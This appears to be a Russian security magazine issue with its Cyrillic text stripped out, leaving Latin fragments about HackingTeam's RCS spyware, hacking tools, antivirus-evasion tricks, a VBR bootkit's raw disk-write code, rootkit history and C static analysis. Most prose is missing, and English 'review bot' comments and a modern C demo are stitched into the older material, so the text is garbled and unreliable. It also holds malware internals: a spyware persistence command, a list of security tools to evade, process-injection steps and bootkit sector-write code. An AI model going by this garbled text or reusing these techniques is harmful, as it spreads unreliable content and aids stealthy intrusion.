IT-
,


.
,
.

DVD

,



RCS


- ? , ,
, , . ,
, ,
?
2011 Chaos
Computer Club (CCC) -
,
,
.
.
XDA-developers ,
, Android iPhone,

.
.
Remote Control System,
, , ,
.

REMOTE CONTROL SYSTEM


,
.


, x64-

Android-

HackingTeam (www.hackingteam.it)
.
, RCS
.
, ,
, ,
. , Skype, Google Talk IM.
-,

. , RCS ,

,
. Windows, Mac
,
iPhone Android. , RCS

. :
, Zone Alarm
, RootkitRevealer
. Wireshark,
-,
HTTP-POST- .

CARRIER IQ:

Android- HTC,
,

, ,
, , ,
. . ,
Carrier IQ,
,
.
CIQ,
. , CIQ
.
Sense
UI, Samsung
Touch Wiz.
,
, root,
( bit.ly/sdkKcE).


, ,

. RCS
C, %APPDATA%,
Run,
- . , , .
exe,
dll RCS.
, Windows (
/):
1. 7KOmPPPs.TRK (DLL, x86).
2. a5jt555f.Qu6.
3. CrThBBBT.7ar (DLL, x86).
4. x64- tms5ggg8.T4t (DLL, x64).
5. x64 0Cfkvvvw.HiO (SYS, x64).
6. x86 YDxohhhn.pYS (SYS, x86).

x64- . ,

. ,
( ), .

?
, x86- RCS.
,
x86. Dll
: HFF1,
HFF2, ..., HFF8. Run, , :
rundll32.exe "c:\trSMKKK0\7KOmPPPs.TRK",HFF8



,
HFF8. , dll IDA, ,
- ,

,
,
, .
, .

HFF8
. :
, rundll32.exe ,
dll, ,
HFF1 .
GetModuleFileNameExW
dll ( ), ASCII
.
shared-, ,
, dll .
, (
) shared-
.

. , shared- .
FileMapping. ,
KMS1, KMS2, KMS3.
hex-. , .
.
Android

R2D2
Chaos
Computer Club (CCC) ,
, ,
.
- C3POr2d2-POE, R2D2. DLL
mfc42ul.dll winsys32.sys x86.
DLL SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ,
,
GUI-. ,
, ,
Skype,
. ,
, RCS. ,
,

AES ECB ,

.
CCC

. CCC
,
www.ccc.de.


.

MSH4DEV1, x86- ( 6
). , handle . , .
:
.
: Avira, Avast, Eyee, ProcGuard,
McAfee, Kerio, Comodo, Panda, TrendMicro, Ashampoo, Kaspersky,
AVG, BitDefender -
. , YDxohhhn.pYS (
),
Windows ndisk.sys.
ADVAPI32 CreateService, StartService
. . MSH4DEV1
ndisk.sys. , ,
.
. AES CBC
128 . ,
.
KeyExpansion,
. shared-.
, ,



128- .
-
.
-,
,
, ,
, .
.

,
.
,
.
: HFF1, HFF2, HFF3.
, .
,
(while(true){ Sleep(1000); }).
,
.
: FileMapping
(KMS1..., KMS2..., KMS3...), ,
.
.

ANDROID- RCS
Android-
apk-,
,
.
apk Java-
ApkManager, .
,
, , . . ApkManager

,
.
apk- ,
native- (so),
. ,
AES CBC.
PKCS#5 , ,
.
,
-.
,
.
,
- Android
root (
). RCS (SMS,
MMS, ) ,

.
com.android.service, .
, Dr.Web
Light Android,
.


WinAPI ,
GetProcAddress.
.
.
64-
x86.
, , 64-, , dll
, x64.

, , : dll . FileMapping
( HFF4),
( HFF3). dll
,
( , ).
.
, , .
, :
pcts*.exe
k7*.exe
avk.exe
admin.exe
bgscan.exe
avp.exe
pavark.exe
rku*.exe
svv.exe
IceSword.exe
gmer.exe
avgscanx.exe
RootkitRevealer.exe
avscan.exe
avgarkt.exe
sargui.exe
uncrackme.exe
hiddenfinder.exe
hackmon.exe
TaskMan.exe
outlook.exe
skypepm.exe
skype.exe
chrome.exe
firefox.exe

,
, RootkitRevealer.exe ololo.exe,
. :-)



:




RCS

-.
- , .
KMS1 ( 20 ) .
DWORD _ + _
.
300
. JPEG, speex (CrThBBBT.7ar). AES
CBC ( ),
. LOG_XXXX_YYYYYYYYY.log,
XXXX , Y...Y .
HTTP POST-. -
, ,
, ,

. :-)

,
, . ,
,
.
explorer.exe .
Firefox: mozcrt19.dll, softokn3.dll mozsqlite3.dll,
SQLite- .
.



.
dll
.
, , ,
(
, , ,
).
, .
, . ,
,
, .

SUMMARY

Dr.Web Light


, ,
. ,

. Android

, ,
,
. , Zeus, TDSS, SpyEye . z


>> coding

(icq 884888, http://snipper.ru)

X-Tools


:
Michael Hendrickx
URL:
michaelhendrickx.com/lilith
:
*nix/win

1
LILITH
LiLith
HTTP-. -
<form>,
SQL-. LiLith
, ,
:
,
-.
:
;
ColdFusion;
: , - ..;
.
:
./lilith.pl www.target.com

:
d ;
u basic authentication;
p ;
T ;
f ;
r ;
A HTTP-.
,
.


URL:
bit.ly/sw1I4w
:
*nix/win

:
David Rook
URL:
agnitiotool.sourceforge.net
:
Windows

SHELLFY:


AGNITIO

,
Shellfy. ,
Perl, . Shellfy
: .
PHP-,

(, ,
),
, , Perl'
. ,
:
(Shells);
(Domains);
(Stats);
(Update);
(Settings);
(Proxy).

-
. Agnitio

. ,
: ASP, ASP.net, C#,
Java, JavaScript, Perl, Php, Python, Ruby, VB.net,
XML.

:
;

;
;
,
,
;
;
;
,

( -).

. , Agnitio
(
) .


,
.
:
cgi-bin
setup.pl.
.
Shellfy
.


:
Corey Goldberg
URL:
www.webinject.org
:
*nix/win

:
Erik Hjelmvik
URL:
bit.ly/egH2pr
:
Windows

HTTP-
WebInject ,
-
-.

HTTP (JSP, ASP, CGI, PHP,
AJAX, Servlets, HTML Forms, XML/
SOAP Web Services, REST . .),

,


( ,
-).
API

:
Edge-Security
URL:
bit.ly/OA9vI
:
*nix/win

:
Ahmed Saafan
URL:
code.google.com/p/fbpwn
:
*nix/win


NETWORKMINER


E-MAIL

NetworkMiner

, PCAP.
, ,
, ,
. NetworkMiner

, ,
.

, .
- . FTP, HTTP
SMB.
( ).
WLAN (IEEE 802.11).
, 500
,
.
NetworkMiner.

- ,

.
e-mail, .. ,
Acunetix
WVS ,
. ,

theHarvester,
BlackHat.

,
PGP.
:
XML HTML;

;
DNS reverse lookup;

Google, Bing, Linkedin Exalead.


XML,
. XML- , ,

.

,
Perl .

WebInject
Windows.
Perl.

e-mail',
microsoft.com
:
./theharvester.py -d microsoft.com \
-l 500 -b google

6
FACEBOOK!

. !

!
FBPwn
- Java-, Facebook.

.
,
,
.
FBPwn
:
1. .
2. friending-, .
3. cloning-,

.
4. .
5.
.
, , ,
:).


ZeroNights
2011


-
, non-stop , 11 , $10 000
, 0day-
,
ZeroNights 2011.

,
? :)
.
,
, . ,
.

,
, -
.
,
.
, ,
,
. ,
, ,
.

,
, . !

, live-
,
,
SCADA-
, ,

? :
,
?,
, ,
:).
,
.
,
,


)
, .
ONsec,
$5 000.
0day-,
,
.
?

RESPECT!

: .
FastTrack: 1520 .

, . , !

,
,
XSS, ZeroNights :).
, toxa (

2011 , ,
.
Chaos
Construction ( ),

: PHD ZeroNights.
,
, , , ,
,
.
. ,
: , , , ,
,
:). z


.
Lockpicking Village
:

.
,
crackme ,
SAP
.
,

, .
[RDOT].

! :)

][

-
,



.

(APT)
,
.


?

0day
,
, ,

,

.


HTTP-,

:



HTTP-,

.


- .


-


,
.

,
,
.
:).

3G LTE:


3G LTE.

,
,

SS7-.


MALWARE

(201074@mail.ru)

.
!

WWW


(callback) Windows

: www.sww-it.ru/2010-02-21/362.

DVD

Blacklight F-Secure,

PID.


,
,
,

.


1. ,

,
HIPS (Host Intrusion Prevention
System), , , ,

, -
. ,
-, ,
. ,
,
,
,
, -
,
.
,
,

2. , )


,
,

(
, ,
- ( 1
)).

,

,
, , , . , .

?
,
-

. , ,
2. (,
),
. ,
( ,
P2P-, ,
, )
,
. ,
:
-
(, , . .)
, , - ( ,
- ,
).

PID

3. McAfee Antivirus Plus


(, Blacklight F-Secure SpyDLLRemover)



(BPID).

.
PID.
, Blacklight
OpenProcess

0x0 0x4E1C. ,
,
. CreateToolhelp32Snapshot ,
.
:
,
.


4. RegNotifyChangeKeyValue.
McAfee, . ,

Event (),

.
RegNotifyChangeKeyValue, Windows
CmRegisterCallBackEx,
.

callback- ( ),
. , RegNotifyChangeKeyValue,
,
( ,
2010 klif.sys
( 5)). ,
( ,
,
) (McAfee,
,
RegNotifyChangeKeyValue),
.


( explorer.exe svchost.exe),

(, ) ,
.
,
, .



.

, .
, , .

-
( , DLL, Internet
Explorera . .). ,
: ,
. , ,
, .

API-
.
,
RegOpenKey,
RegCreateKey, RegDeleteKey advapi32.dll NtOpenKey,


NtCreateKey, NtDeleteKey . . 3
, McAfee .
API-
RegNotifyChangeKeyValue. Windows
,
, .
(
4).


,
,
.

explorer.exe, svchost.exe.
, .
explorer.exe,

5. CmRegisterCallBackEx klif.sys
2010


6. NtUserFindWindowEx

FindWindow ( FindWindowEx) progman. FindWindow,


, NtUserFindWindowEx,
, ( 6), ,
explorer.exe.
. :

OpenProcess,
PAGE_EXECUTE_READWRITE (API- VirtualAllocEx),
, ,
,
(SuspendThread),
(GetThreadContext),

,
(SetThreadContext)
(ResumeThread),
, .
:
OpenProcess, -

7. DrWeb

,
(VirtualAllocEx), WriteProcessMemory
API-
CreateRemoteThread.

, OpenProcess\VirtualAllocEx\
WriteProcessMemory\SuspendThread\
GetThreadContext\ SetThreadContext\
ResumeThread OpenProcess\VirtualAllocEx\



( -
). ,
( 1).
:
, 0 1,
. ,
, ,
.
,
()
().
, (


,
1, , 0, ),

( 0 1,
,
).
(
) ( ).
( )


: ,
.

WriteProcessMemory\ CreateRemoteThread
, , , ,
,
API
. ,
,
API GetProcAddress ,
- .
, WriteProcessMemory.

,
. ,

.

NtAllocateVirtualMemory, NtFreeVirtualMemory
NtWriteVirtualMemory, API
CreateRemoteThread NtCreateThread. ,
, DrWeb dwprot.sys ( 7).


PsSetCreateThreadNotifyRoutine.
,

( 8).

,
, ,
,
.



, - ,
,
,

Task Manager.
, ,
,
.

9. PsSetCreateProcessNotifyRoutine DrWeb

. Windows

- .
( CmRegisterCallBackEx,
RegNotifyChangeKeyValue PsSetCreateThreadNotifyRoutine).

PsSetCreateProcessNotifyRoutine (PsSetCreateProcessNotifyRoutineEx Vista SP1),


( , 9
callback-
dwprot.sys ).
:

.
, ,
.


.
, , -
?
-,
, ,
( , ,
). -,

. -, ,
PID,
.
-, CreateToolhelp32Snapshot
( NtQuerySystemInformation
) ,

8.


10. PsSetLoadImageNotifyRoutine DrWeb

.
, , .

ZwQuerySystemInformation
. (,
, API- Zw
Nt?
, .) , ,
- ,
.
, -

,
.


, ,
-

,
MS-DOS.
, ring0.
,

,

. ,


.
,
,
API-
NtLoadDriver. , -, ,
( , Comodo, F-Secure,

,
). ,
. PsSetLoadImageNotifyRoutine
,

.
callback-
,
(
, ,
), ( 10).
,
,
HKLM\System\CurrentControlSet\Services (
11). ,
Type,
1, 2 8 ( SERVICE_KERNEL_DRIVER,
SERVICE_FILE_SYSTEM_DRIVER SERVICE_RECOGNIZER_DRIVER ),
( 11).
, .



, ,
, ,
.

11. Kernel Detective 1.2.


, ?..



,
,
.
,
-, , ,

,
. z


MALWARE

(stannic.man@gmail.com)

VBR

,

BOOT-






,

.

.

INFO

Windows
System Programming,
2010 .
,
.

WWW




Windows,
www.osronline.com.



kernel mode ,


64-
.

, -
.
,
, , . , , ,
? . ,
,

, SMS-. , ,

, VBR.


VBR-
Dr.Web Trojan.Mayachok.
, .
.

,
.
( , DOS),
(Volume Boot Record, VBR) - ,
. Master Boot Record (MBR),
, .
, VBR . VBR (Disk
Parameter Block),
, , , ..,
(Volume Boot Code),
.
(master boot) , .
MBR VBR
http://thestarman.narod.ru/asm/mbr/index.html. VBR- ,
,

,
VBR. VBR- INT 13h
, .

VBR. . ntldr, bootmgr, osloader.exe, winload.exe . ., ,
Windows. ,
,
(dr0-dr7) .
,
.

nt!KiSystemStartup,
IDT PatchGuard.


:
LOADER_PARAMETER_BLOCK, LoadOrderList
(
), BootDriverList , \Registry\Machine\System\CurrentControlSet\Services\null.
. , ,
raw- . API-
nbtdll!DeviceIoControl IOCTL_SCSI_PASS_THROUGH_DIRECT.
SCSI_PASS_THROUGH_DIRECT
SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER, SRB (SCSI Request Block).
:
if (Flags & SCSI_IO_WRITE_SECTOR)
{
Direction = SCSI_IOCTL_DATA_OUT;
OpCode = SCSIOP_WRITE;
OpCode16 = SCSIOP_WRITE16;
}
else
{
Direction = SCSI_IOCTL_DATA_IN;
OpCode = SCSIOP_READ;
OpCode16 = SCSIOP_READ16;
}
if (Spt = (PSCSI_PASS_THROUGH_DIRECT)malloc(bLen))
{
Sptb = (PSCSI_PASS_THROUGH_DIRECT_WITH_BUFFER)Spt;
hDrive = CreateFile(Drive, ....);
if (hDrive != INVALID_HANDLE_VALUE)
{
Spt->Length = sizeof(SCSI_PASS_THROUGH_DIRECT);
Spt->SenseInfoLength = SPTWB_SENSE_LENGTH;
Spt->DataIn = Direction;
Spt->DataTransferLength = Length;
Spt->TimeOutValue = 200;
Spt->DataBuffer = Buffer;
Spt->SenseInfoOffset = (ULONG)
((PCHAR)&Sptb->SenseInfoBuffer - (PCHAR)Sptb);
if (LOBYTE(LOWORD(GetVersion())) > 5)
Spt->Cdb16.OperationCode = OpCode16;
else
Spt->Cdb16.OperationCode = OpCode;
Spt->Cdb16.ForceUnitAccess = TRUE;
// Spt->Cdb16
Spt->Cdb16.Control = 0x10;
// SRB block
Status = DeviceIoControl(hDrive,
IOCTL_SCSI_PASS_THROUGH_DIRECT, Spt, bLen,
Spt, bLen, &bRead, NULL);
}
free(Spt);
}

, VBR-

. ,
. ,
, Mayachok
. ,
SMS-.
, youtube.com,
vkontakte.ru, odnoklassniki.ru, rostelecom.ru, support.akado.ru,
my.mail.ru .
- Trojan.Mayachok.1
URL ,
.
SMS-.
,
,
. , Trojan.Mayachok ,
, SMS- .
, VBR-
(
).

...

- .
, ,
,
. , TDL atapi.sys,
. VBR- ,
,
. , ,
VBR- . ,

? (.
). , VBR,
dll ,
PsCreateProcessNotifyRoutine .


,

, (
, , dll ). ,

PsCreateProcessNotifyRoutine
APC. ,
TDL/TDSS, ,


, .
. ,
,
VBR-, . ,
, TDL/TDSS ,
, ,
. z


MALWARE

deeonis (deeonis@gmail.com)


.
- .
, ,
, . rootkit'
UNIX-
. Microsoft.
MS-DOS -


1986
1986
(Amdjat Basit Faroog Alvi)
Brain. ,
,
, ,
,
.
Brain
,
- .
Brain -,
,
, 18 .

- MS-DOS. DOS. , --
Kerplunk 23 :
, ,
.

1993
1993 Microsoft
Windows NT 3.1,
.
,
-. MS-DOS,
.

1990

1995

XX

. 1990 Chameleon,
, , -.
Chameleon
.
1990-
Frodo Whale. -,
Whale
.

1995 Windows-
(Jeffrey Richter) Programming Applications for
Microsoft Windows ring3.

, .

1992
ExeHeader 1992 .
13h- /
,
MZ.
ExeHeader.396,
21h- exe-
.
. ExeHeader 16h, 1Ch, 2Fh.

1997
win32-, , 1997-
Win32.Cabanas. PE-,
. 101 , .
, Cabanas API-,
FindFirstFileA, FindFirstFileW, FindNextFileA
FindNextFileW. ,
, ,
- ,
.

, -
. , Win9x.
Zerg Windows
95/98 /, / .

BluePill .

,
.

1999
1999 (Greg Hoglund)
NT Rootkit,

Windows. PHRACK,
-,
, .
. Windows NT (P. Dabak et al Undocumented
Windows NT),
ring0.

Windows 2000, 2001 .

Black Internet Trojan www.weathertalkz.com


2000
he4hook.
,
.
,
.

2002
2002 Hacker
Defender ( HacDef). ,
, ,
he4hook. HacDef
, .

user-mode.

2003
Vanquish 2003 .
,
, ,
,
,
. Vanquish ring3.
Haxdoor.
,
- .
.
A-311 Death.

2004
2004 FU, .

Mebromi


,
, ,
.


, HacDef
FU.
,
,
-, Haxdoor.
Haxdoor, FU HacDef
80 % .
rootkit,
. .

2005
2005 ,
. , ,
RSA Security Microsoft
.
-

-.
,
,

rootkit-. .
GMER Rootkit Unhooker.
eEye
BootRoot,

. , ,
MBR,
MS-DOS. ,
Windows .

2006
2006 - e-mail- ,
Bagle Goldun. Rustock
rootkit-.


25 .

.

, , , ,
.
.
,
. 2006-
: SubVirt, Vitrio BluePill.
Black Hat Briefings
2006
Windows Vista.
,

. ,
100 % ,
. -


Mebratix

RedPill,


BluePill.

2007
2007
. Vbootkit, .

Windows Vista, .

:
Sinowal, Mebroot.
,
.


Mebroot, .
2007 - IceLord, .
, ,
.

2008
RedPill, -


, .
,
. , , . 2008 North
Security Labs ,
BluePill .
,
,


, ,
, -
-. .

2010
2010-,
-,
: Alipop, Black Internet Trojan Ghost
Shadow (Mebratix.b). , AdWare .
Mebratix
Symantec, Black Internet Trojan

.
rootkit
64- Windows. ,
, BackDoor.Tdss.
, , 2010
Stuxnet.

, ,
,
.
,

SIMATIC S7 SCADA SIMATIC WinCC Siemens.
- Stuxnet
.

2011
2011- Qihoo 360
BIOS- Mebromi. , ,
BIOS, MBR,
ring0, PE . Mebromi
BIOS-
IceLord, 2007 .

,
. MBR,
BIOS . ,
,

.
z


Preview
UNIXOID
104


OPENSOURCE 2011

2011 open source,
.
, ,
SQL- mysql.com.
, Microsoft
Oracle
-
. -
: 3.0
Linux, , Gnome KDE,
.

.
.

88


,
,
.

UNIXOID

94

HOW-TO: PE-

PE.
!

SYN\ACK

122



Windows Server 8
.
MS .

110




OpenSSL OpenSSH,
.

FERRUM

126

IT-
IDS/IPS?
- 5

.

132

SANDY BRIDGE

AMD A75?
, 6
.


(bumshmyak@yandex.ru)



C/C++

, ,


C/C++
.

. ,
.
. ?

?
? , , , .
?
,
?
,
.
, ,
C/C++. ,
. -,
(Coverity, PolySpace, PVS-Studio, Microsoft /analyze
flag ). -, ,
, .
, , :
GCC, Dehydra, Clang static analyzer, Cppcheck Coccinelle.


WWW
bit.ly/zihvQ c


.
bit.ly/16VLIE
GCC,
.
bit.ly/uEU4VQ
GCC,
,

++.
bit.ly/uD9w0B


GCC.
bit.ly/vZpq7F
GCC.
mzl.la/DWbf4
Dehydra.
bit.ly/11xRuQ Clang
Static Analyzer.
bit.ly/20g5f1
Cppcheck.
bit.ly/1Z3wXP
Coccinelle.
http://mzl.la/tEyXCL
DXR.

GCC


. http://bit.ly/16VLIE
GCC, . .
-Wall ,
, , .
(-Wformat):
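#include <stdio.h>

void Wformat() {
  double x = 1;
  // -Wformat: %d expects an int, but x is a double
  printf("%d\n", x);
  char s[] = "%d\n";
  // the format is not a string literal, so its arguments cannot be
  // checked (-Wformat-nonliteral, enabled by -Wformat=2)
  printf(s, x);
}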

(-Warray-bounds,
-O2, ):
int test_bounds[10];

int Warray_bounds() {
  return test_bounds[10];
}

(-Wuninitialized) .
-Wextra .
, , , (-Wsign-compare):


int Wsign_compare() {
  int x = -1;
  unsigned int y = 3;
  if (x > y)
    return 1; // taken: x is converted to unsigned int, so -1 becomes UINT_MAX
  else
    return 0;
}

-Wall -Wextra,
:
-Wconversion ,
(, double
int int unsigned int).
-Wcast_qual , ,
:
void Wcast_qual() {
const char* s = "constant string";
((char*)s)[0] = 'n';
}

C :
-O2 -Wall -Wextra -Wformat=2 -Winit-self -Warray-bounds
-Wdiv-by-zero -Wfloat-equal -Wundef -Wshadow -Wcast-qual
-Wconversion -Wempty-body -Waggregate-return
-Wunreachable-code

bit.ly/uEU4VQ ,
C++. :
-Weffc++
Effective C++ More Effective C++.
,
(
, -Wnon-virtual-dtor),
-.
-Wold-style-cast
C ( ). ++, ,
dynamic_cast, static_cast, reinterpret_cast const_cast.
++ :
-Wctor-dtor-privacy -Weffc++ -Wold-style-cast
-Woverloaded-virtual

GCC , , (bit.ly/uD9w0B).
. .
( )
deprecated.
.
:

,
my_memcpy . ,
,
NULL.
( ):
int* dest = NULL;
int* src = NULL;
my_memcpy(dest, src, 10);

DEHYDRA
4.5, GCC API
, .
bit.ly/vZpq7F .
Dehydra,
C++. Dehydra,
Mozilla, ,
++.
() JavaScript,
. Dehydra :
process_type(type) ,
type .
process_function(decl, body)
(decl , body ,
).
process_decl(decl)
, .
Dehydra. ,
,
, ,
. JS- callgraph.js:
function print_all_fcalls(varobjs) {
  for each (let obj in varobjs) {
    if (obj.isFcall)
      print(" " + obj.name)
    if (obj.assign) // right side of assign
      print_all_fcalls(obj.assign)
    if (obj.arguments) // arguments of fcall
      print_all_fcalls(obj.arguments)
  }
}

function process_function(decl, body) {
  print(decl.name + ":")
  for each (let b in body) print_all_fcalls(b.statements)
}


process_function, , .
(, - -

int sqr(int x) __attribute__ ((deprecated));

nonnull. , . ,

extern void *
my_memcpy (void *dest, const void *src, size_t len)
__attribute__((nonnull (1, 2)));


scan-build scan-view


, scan-build

,
), .
workandsolve.cc:
int work(int data);
int solve(int data);
int work(int data) {
int res = solve(data);
return res;
}
int solve(int data) {
int res = work(data);
return res;
}
int main() {
solve(10);
return 0;
}

DXR

CLANG STATIC ANALYZER


Clang C/C++/Objective-C,
LLVM (llvm.org). Clang ,
clang ( clang++)
--analyze. (bit.ly/11xRuQ) ,
. : core, deadcode, osx, unix. core ,
GCC:
;
;

;
, Objective-C.
osx, Mac OS X.
, , clang static analyzer. clang analyzer . clangtest.c:

Dehydra:
g++ -fplugin=~/dehydra/gcc_dehydra.so -fplugin-arg-gcc_\
dehydra-script=callgraph.js workandsolve.cc -o /dev/null

:
work(int):
solve(int)
solve(int):
work(int)
main():
solve(int)
work(int)

- ,
: mzl.la/
DWbf4.
Dehydra .
.
mozilla-central (bit.ly/vJEl1B)
, Mozilla,
, . , final.js ,
, final.
, , .


#include <stdio.h>
int div_by_zero() {
int x = 0;
int y = 5 / x;
return y;
}
int null_dereference() {
int x = 0;
int* p = NULL;
if (x > 0)
p = &x;
return *p;
}
int main() {
return 0;
}

:
clang --analyze clangtest.c -o clangtest

:
clangtest.c:5:13: warning: Division by zero
int y = 5 / x;
^


clangtest.c:15:10: warning: Dereference of null pointer...


return *p;
^~
2 warnings generated.

x > 0 x >= 0 null_dereference,


, , .
clang scan-build,
. , .
.
,
CC CXX , .
clangtest.c
Makefile:
clangtest : clangtest.c
$(CC) -o clangtest clangtest.c

scan-build make. ,
scan-view.
Clang ,
DXR, . DXR
. ,
, ,
, .
, DXR Dehydra. DXR
, mzl.la/tEyXCL.

CPPCHECK
Cppcheck C++. Cppcheck , .
,
.
, C++.

:
cppcheck --rule="/ 0"

C++:
void CheckOther::divisionByZero() {
// Loop through all tokens
for (const Token *tok = _tokenizer->tokens();
tok; tok = tok->next()) {
// check if there is a division by zero
if (Token::Match(tok, "/ 0")) {
// report error
divisionByZeroError(tok);
}
}
}

Cppcheck .
:
;
;
STL Boost;
;


;
;
. .
Cppcheck , . , .
: ,
.
class Newbie {
public:
Newbie() {
resource = new int[256];
}
private:
int* resource;
};
int main() {
Newbie noob;
return 0;
}


Cppcheck .!
bit.ly/s6RQoH , Cppcheck
. , ,
C.
- .

COCCINELLE
Coccinelle ( [])
-. SmPL (Semantic
Patch Language). , C . coccinelle
. ,
,
.
? Coccinelle .
,
. coccinelle ,
. ,
. , ,
.
:
@[ ]@

@@

,
@. - (,
, ).
.

C. ,
,
( , ). .
,
!x & y,


Linux, Herodotos

coccinelle. , flags,
. ,
, :

int flags = UGLY_FLAG;


if (!flags & UGLY_FLAG)
if (!(flags & UGLY_FLAG))
return 1;
else
return 0;

-dir spatch C- .
, !x & y .
bit.ly/d1qgI6 ,
coccinelle Linux. , 20
!x & y!
,
(bit.ly/rVQQ9Z):

!(flags & UGLY_FLAG)

,
:
!flags & UGLY_FLAG

!flags , , ,
, , . , , :
notand.cocci
@notand@
expression E;
constant C;
@@
- !E & C
+ !(E & C)

, notand.
, E, , C,
. , , !E & C.
:
notand.c
#define UGLY_FLAG 0x2
int main() {
    int flags = UGLY_FLAG;
    if (!flags & UGLY_FLAG)
        return 1;
    else
        return 0;
}

Coccinelle spatch, C-.


C, spatch diff, .
spatch :
spatch -sp_file notand.cocci notand.c

:
HANDLING: notand.c
diff =
--- notand.c
+++ /tmp/cocci-output-3029-af66fa-notand.c
@@ -2,7 +2,7 @@
int main() {


--- a/drivers/serial/m32r_sio.c
+++ b/drivers/serial/m32r_sio.c
@@ -421,7 +421,7 @@ static void transmit_chars(
struct uart_sio_port *up)
while (!serial_in(up, UART_LSR) & UART_LSR_THRE);
+
while (!(serial_in(up, UART_LSR) & UART_LSR_THRE));
} while (--count > 0);
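Review bot: the fixed wait at `while (!(serial_in(up, UART_LSR) & UART_LSR_THRE));` is an empty-bodied spin with no bound, so if the transmitter-empty bit never comes up, transmit_chars() never returns. With the old precedence the condition was `(!serial_in(...)) & UART_LSR_THRE`, that is 0 or 1 masked with the flag, so unless the flag is bit 0 the loop fell through at once and this patch is what makes the wait real. Suggest a retry limit or timeout on the poll, and a line in the commit message saying the change alters timing as well as correctness.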

Linux
, memset
. :
@@
type T;
T *x;
expression E;
@@
memset(x, E, sizeof(
+ *
x))

, x T E. memset,
,
*, T.
Linux (bit.ly/rsLIlg):
--- a/drivers/staging/wlan-ng/prism2fw.c
+++ b/drivers/staging/wlan-ng/prism2fw.c
@@ -439,7 +439,7 @@ void free_chunks(imgchunk_t *fchunk,
unsigned int *nfchunks)
}
}
*nfchunks = 0;
memset(fchunk, 0, sizeof(fchunk));
+
memset(fchunk, 0, sizeof(*fchunk));
}
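Review bot: in free_chunks() the corrected `memset(fchunk, 0, sizeof(*fchunk))` clears exactly one imgchunk_t, while the signature (a chunk pointer plus a separate `nfchunks` count) suggests fchunk is an array. If it is, only the first element is wiped, and because `*nfchunks = 0` runs on the line before, the element count is already gone when memset is called. Suggest saving the count first and clearing `count * sizeof(*fchunk)` bytes, or passing the array capacity in explicitly.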

SmPL
, ( )
.
. malloc ,
-.
, ( ). - , , .
,
. ,


. Linux 13
(bit.ly/d1qgI6). ,
:
@leak@
type T;
T* x;
statement S;
identifier a =~ ".*alloc$";
@@
* x = a(...);
if (x == NULL) S
... when != x
* return ...;

, ,
a, , alloc.
, ,
.
, .
* x = a(...);

+ , , . *
. .
, when:
... when != x

, , x ( x ).

diff:
diff =
--- leak.c
+++ /tmp/cocci-output-11639-4c40d5-leak.c
@@ -2,12 +2,10 @@
int main(int argc, char** argv) {
char* param;
- param = malloc(257);
if (param == NULL) {
return 1;
}
if (argc < 2) {
return 1;
}
// ... using param
free(param);
return 0;
}

, ( *).
SmPL , , (
- , -),
Python . .
coccinelle (bit.ly/1Z3wXP).
coccinelle .
Coccicheck , :
;
NULL;


Cppcheck

sizeof(pointer);
!x & y;
;
.
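The `!x & y` and `sizeof(pointer)` patterns matched by the semantic patches above can be reproduced and measured in a few lines of C. This is an added example, not code from the article or from Coccinelle; `struct chunk` and all function names are constructed for illustration, and `UGLY_FLAG` takes the value used in notand.c.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define UGLY_FLAG 0x2u /* value taken from notand.c */

/* Pattern 1: "!x & y". '!' binds tighter than '&', so this evaluates
 * (!flags) & UGLY_FLAG. !flags is 0 or 1 and neither value has bit 1
 * set, so the function returns 0 for every input. */
static int flag_is_clear_buggy(unsigned flags)
{
    return !flags & UGLY_FLAG;
}

/* The form the notand.cocci patch rewrites it to. */
static int flag_is_clear_fixed(unsigned flags)
{
    return !(flags & UGLY_FLAG);
}

/* Count the inputs in 0..255 for which the two versions disagree. */
static unsigned precedence_mismatches(void)
{
    unsigned n = 0;
    for (unsigned flags = 0; flags < 256; flags++)
        n += (flag_is_clear_buggy(flags) != flag_is_clear_fixed(flags));
    return n;
}

/* Pattern 2: memset(x, E, sizeof(x)) where x is a pointer.
 * struct chunk is a constructed stand-in for a driver record. */
struct chunk {
    unsigned addr;
    unsigned len;
    unsigned char data[24];
};

static void wipe_buggy(struct chunk *c)
{
    /* sizeof(c) is the size of the pointer, not of the object.
     * It is stored in a variable first only so that the demo compiles
     * without the compiler's own sizeof-pointer diagnostic. */
    size_t n = sizeof(c);
    memset(c, 0, n);
}

static void wipe_fixed(struct chunk *c)
{
    memset(c, 0, sizeof(*c));
}

/* Fill a chunk with 0xAA, run the given wipe, and count the bytes
 * that still hold data afterwards. */
static size_t bytes_left_after(void (*wipe)(struct chunk *))
{
    struct chunk c;
    const unsigned char *p = (const unsigned char *)&c;
    size_t left = 0;

    memset(&c, 0xAA, sizeof(c));
    wipe(&c);
    for (size_t i = 0; i < sizeof(c); i++)
        left += (p[i] != 0);
    return left;
}

int main(void)
{
    printf("!x & y: buggy and fixed tests disagree on %u of 256 inputs\n",
           precedence_mismatches());
    printf("sizeof(pointer): %zu of %zu bytes survive the buggy wipe\n",
           bytes_left_after(wipe_buggy), sizeof(struct chunk));
    printf("sizeof(*pointer): %zu bytes survive the fixed wipe\n",
           bytes_left_after(wipe_fixed));
    return 0;
}
```

When the structure holds key material or credentials, the bytes that survive the buggy wipe are exactly what the caller meant to erase.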

coccicheck ,
(,
, ). Coccicheck
scripts/ coccinelle.
Herodotos (bit.ly/vrmt8v)
.
.
Coccigrep (bit.ly/qxM9nd) grep C.

( DXR).
Spdiff (bit.ly/rLhp7P) diff, .
,
.
Coccinelle c
(bug that eats another bugs).
, , , SmPL, . .
, Linux (
bit.ly/d1qgI6, ).

,
?

( -Wall). (, intel,
clang). . C++, (++ ;
,
GCC). Cppcheck,
. C++ Dehydra,
, , .
. Coccinelle,
Frama-C.
, .

(
). ,
.
, ,
,

. . z


HOW-TO:
PE-

Peter and the Wolf

DVD

INFO




DVD.

LoadExecutable


,

,

.

,
PE-,
- .
,

. , - ,
,

, - .
.
,

.
-, Windows XP ,

UPX. ,
UPX ,
. , .
. .
(Zeus
2.0.8.9, bit.ly/v3EiYP). ,
(Windows 2000, bit.ly/rBZlCy).
, ,
, .
(bit.ly/vRPCxZ,


bin2h

bit.ly/tSUxT7) ,
Volodya NEOx.
, , , PE-.

,
.
, ,
:

, , notepad.exe. 32- - 60 . , .
? ,
.
.
. - ,
60 , , ,
20 . ,
, ,
, .
(), ,
. , ,
. ,
( , ) , , ,
.
,
. ,
, , .
:
PE- ;
- ;
PE
-.
:
PE-;
;
PE-, , .
, .

, , ,
PE-.



